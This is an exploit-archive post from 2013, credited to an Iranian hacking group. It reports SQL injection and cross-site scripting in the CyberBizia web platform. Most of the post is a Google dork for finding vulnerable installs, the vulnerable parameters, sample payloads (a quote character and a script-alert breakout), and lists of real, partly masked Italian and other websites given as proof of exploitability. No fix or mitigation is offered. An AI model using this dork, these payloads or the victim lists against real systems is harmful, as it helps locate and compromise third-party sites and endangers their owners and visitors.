Home / exploitsPDF  

CyberBizia Multiple Vulnerabilites

Posted on 30 August 2013

<pre> #******************************************************************************** # Exploit Title : CyberBizia Multiple Vulnerabilites # # Software link : http://www.cyberbizia.com # # Exploit Author : Ashiyane Digital Security Team # # Tested on: Windows 7 , Linux # # Google Dork : intext:&quot;Powered by CyberBizia&quot; # # Date: 2013/08/29 # -------------------------------------------------------------------- # Exploit 1 : Sql Inkection # # Location : [Target]/myasg/os.asp?elenca=mese&amp;mese=[Sql Injection] # # # Proof: # # http://www.advancXXXiology.it/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.artiXXXri.com/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.basketXXXtu.it/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.cdsdonXXXliari.it/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.digXXXt.it/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.cosXXXo.com/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.cdsdXXXecagliari.it/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.baskXXXrtu.it/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.immobiXXXacanze.it/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.magXXweb.it/myasg/os.asp?elenca=mese&amp;mese=1' # # http://www.archXXXeno.it/myasg/os.asp?elenca=mese&amp;mese=1' -------------------------------------------------------------------- # Exploit 2 : # # Location : [Target]t/?Title=[xss] # # # Proof: # # http://www.advaXXXdiology.it/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.artXri.com/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.basketquartXXu.it/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.cdsdonnXXXecagliari.it/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.digicsXXoft.it/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.costiaXXXuto.com/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.cdsdonXXnecagliari.it/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.baskXXuartu.it/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.iXXXarevacanze.it/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.mozXXXna.com/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.aXXXXXXleno.it/?Title=&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt; # ###################### discovered by : ACC3SS ###################### </pre>

 

TOP